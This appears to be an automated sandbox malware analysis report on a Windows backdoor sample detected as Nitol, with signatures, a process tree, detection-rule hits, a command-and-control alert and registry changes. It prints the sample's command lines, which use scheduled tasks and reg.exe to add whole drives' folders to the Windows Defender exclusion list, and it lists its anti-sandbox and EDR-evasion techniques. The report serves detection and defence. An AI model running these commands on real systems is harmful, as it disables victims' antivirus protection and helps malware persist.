Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2976587-987347589.08.exe

Overview

General Information

Sample name:2976587-987347589.08.exe
Analysis ID:1588718
MD5:3f0d4ac83e0bec29aebc666ff027a5d6
SHA1:0e8432e8855e31eca680181b961852deaba74ee8
SHA256:857bcee55a11cc0dd14006a38bd0ca0a8d7f88ea6018219b55ff797cddccea95
Tags:backdoorexesilverfoxwinosuser-zhuzhu0009
Infos:

Detection

Nitol
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Nitol
AI detected suspicious sample
Adds extensions / path to Windows Defender exclusion list (Registry)
Creates an undocumented autostart registry key
Drops PE files to the document folder of the user
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for dropped file
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE
Sigma detected: Windows Defender Exclusions Added - Registry
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • 2976587-987347589.08.exe (PID: 7616 cmdline: "C:\Users\user\Desktop\2976587-987347589.08.exe" MD5: 3F0D4AC83E0BEC29AEBC666FF027A5D6)
  • XY3LL0.exe (PID: 892 cmdline: C:\Users\user\Documents\XY3LL0.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • XY3LL0.exe (PID: 4456 cmdline: C:\Users\user\Documents\XY3LL0.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
    • cmd.exe (PID: 5272 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 4240 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 5112 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 2960 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 6968 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 6916 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 7500 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 4608 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 1912 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 1692 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 5676 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 1556 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 1880 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 2148 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 2524 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 316 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • byHW9q.exe (PID: 7708 cmdline: "C:\Program Files (x86)\byHW9q\byHW9q.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
      • cmd.exe (PID: 1280 cmdline: cmd /c echo.>c:\xxxx.ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3964 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 4476 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 7656 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 1420 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 2992 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 2552 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 2876 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 3368 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • byHW9q.exe (PID: 1052 cmdline: "C:\Program Files (x86)\byHW9q\byHW9q.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • QmbK8U.exe (PID: 1848 cmdline: "C:\Program Files (x86)\x736Pg9\QmbK8U.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • byHW9q.exe (PID: 7036 cmdline: "C:\Program Files (x86)\byHW9q\byHW9q.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • QmbK8U.exe (PID: 7820 cmdline: "C:\Program Files (x86)\x736Pg9\QmbK8U.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • byHW9q.exe (PID: 5488 cmdline: "C:\Program Files (x86)\byHW9q\byHW9q.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_NitolYara detected NitolJoe Security
    0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NitolYara detected NitolJoe Security
      Process Memory Space: byHW9q.exe PID: 7708JoeSecurity_NitolYara detected NitolJoe Security
        Process Memory Space: byHW9q.exe PID: 7708PlugXStringsPlugX Identifying StringsSeth Hardy
        • 0x31f2f:$Dwork: d:\work
        • 0xa2b7b:$Dwork: d:\work
        • 0xe7f34:$Dwork: d:\work
        • 0xcfe24:$Shell6: Shell6
        • 0xd0c03:$Shell6: Shell6
        SourceRuleDescriptionAuthorStrings
        42.2.byHW9q.exe.3b703e8.7.raw.unpackJoeSecurity_NitolYara detected NitolJoe Security
          42.2.byHW9q.exe.3b703e8.7.unpackJoeSecurity_NitolYara detected NitolJoe Security
            42.2.byHW9q.exe.10000000.8.unpackJoeSecurity_NitolYara detected NitolJoe Security
              7.2.XY3LL0.exe.2890000.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
              • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
              • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
              • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
              • 0x1fc20:$e2: Add-MpPreference -ExclusionPath
              42.2.byHW9q.exe.33c0000.6.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
              • 0x221dd:$e1: Microsoft\Windows Defender\Exclusions\Paths
              • 0x2225b:$e2: Add-MpPreference -ExclusionPath

              System Summary

              barindex
              Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\XY3LL0.exe, ParentImage: C:\Users\user\Documents\XY3LL0.exe, ParentProcessId: 4456, ParentProcessName: XY3LL0.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 5272, ProcessName: cmd.exe
              Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\XY3LL0.exe, ParentImage: C:\Users\user\Documents\XY3LL0.exe, ParentProcessId: 4456, ParentProcessName: XY3LL0.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 5272, ProcessName: cmd.exe
              Source: Process startedAuthor: frack113: Data: Command: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3964, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ProcessId: 4476, ProcessName: reg.exe
              Source: Registry Key setAuthor: Christian Burkard (Nextron Systems): Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 4476, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-11T04:45:15.425167+010028529011Malware Command and Control Activity Detected192.168.2.9499878.217.47.1698917TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: C:\Program Files (x86)\byHW9q\tbcore3U.dllAvira: detection malicious, Label: TR/Redcap.vdzex
              Source: C:\Program Files (x86)\x736Pg9\tbcore3U.dllAvira: detection malicious, Label: TR/Redcap.vdzex
              Source: C:\Program Files (x86)\x736Pg9\tbcore3U.dllReversingLabs: Detection: 78%
              Source: 2976587-987347589.08.exeVirustotal: Detection: 16%Perma Link
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Program Files (x86)\byHW9q\tbcore3U.dllJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\x736Pg9\tbcore3U.dllJoe Sandbox ML: detected

              Compliance

              barindex
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeUnpacked PE file: 42.2.byHW9q.exe.2980000.3.unpack
              Source: unknownHTTPS traffic detected: 39.103.20.105:443 -> 192.168.2.9:49973 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.9:49981 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.9:49985 version: TLS 1.2
              Source: Binary string: BootstrapPackagedGame-Win64-Shipping.pdb source: 2976587-987347589.08.exe
              Source: Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: XY3LL0.exe, 00000008.00000003.2222500406.0000000003FAE000.00000004.00000020.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3239126887.00000000007D8000.00000002.00000001.01000000.0000000A.sdmp, byHW9q.exe, 0000002A.00000002.3239456656.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000000.2666597561.00000000007D8000.00000002.00000001.01000000.0000000A.sdmp, byHW9q.exe, 0000002B.00000000.2687304360.00000000007D8000.00000002.00000001.01000000.0000000A.sdmp, byHW9q.exe, 0000002B.00000002.2695070595.00000000007D8000.00000002.00000001.01000000.0000000A.sdmp, QmbK8U.exe, 0000002C.00000002.2710038033.0000000000638000.00000002.00000001.01000000.0000000C.sdmp, QmbK8U.exe, 0000002C.00000000.2694474917.0000000000638000.00000002.00000001.01000000.0000000C.sdmp, byHW9q.exe, 0000002F.00000002.2713673998.00000000007D8000.00000002.00000001.01000000.0000000A.sdmp, byHW9q.exe, 0000002F.00000000.2703249364.00000000007D8000.00000002.00000001.01000000.0000000A.sdmp, QmbK8U.exe, 00000030.00000002.3201537025.0000000000638000.00000002.00000001.01000000.0000000C.sdmp, QmbK8U.exe, 00000030.00000000.3184324160.0000000000638000.00000002.00000001.01000000.0000000C.sdmp, byHW9q.exe, 00000031.00000000.3187483012.00000000007D8000.00000002.00000001.01000000.0000000A.sdmp, byHW9q.exe, 00000031.00000002.3203863917.00000000007D8000.00000002.00000001.01000000.0000000A.sdmp, byHW9q.exe.8.dr
              Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
              Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, XY3LL0.exe, 00000007.00000000.1996508363.0000000140014000.00000002.00000001.01000000.00000008.sdmp, XY3LL0.exe, 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmp, XY3LL0.exe, 00000008.00000000.2013520702.0000000140014000.00000002.00000001.01000000.00000008.sdmp

              Change of critical system settings

              barindex
              Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\ProgramDataJump to behavior
              Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\UsersJump to behavior
              Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Program Files (x86)Jump to behavior
              Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\user\DocumentsJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 7_2_00007FF8FDF9A1B8 FindFirstFileExW,7_2_00007FF8FDF9A1B8
              Source: C:\Users\user\Documents\XY3LL0.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]7_2_000000014000DFFE
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]7_2_000000014000DDFF
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 4x nop then movsxd rbx, qword ptr [r14+10h]7_2_0000000140011270
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]7_2_000000014000DE96
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]7_2_000000014000DEFB
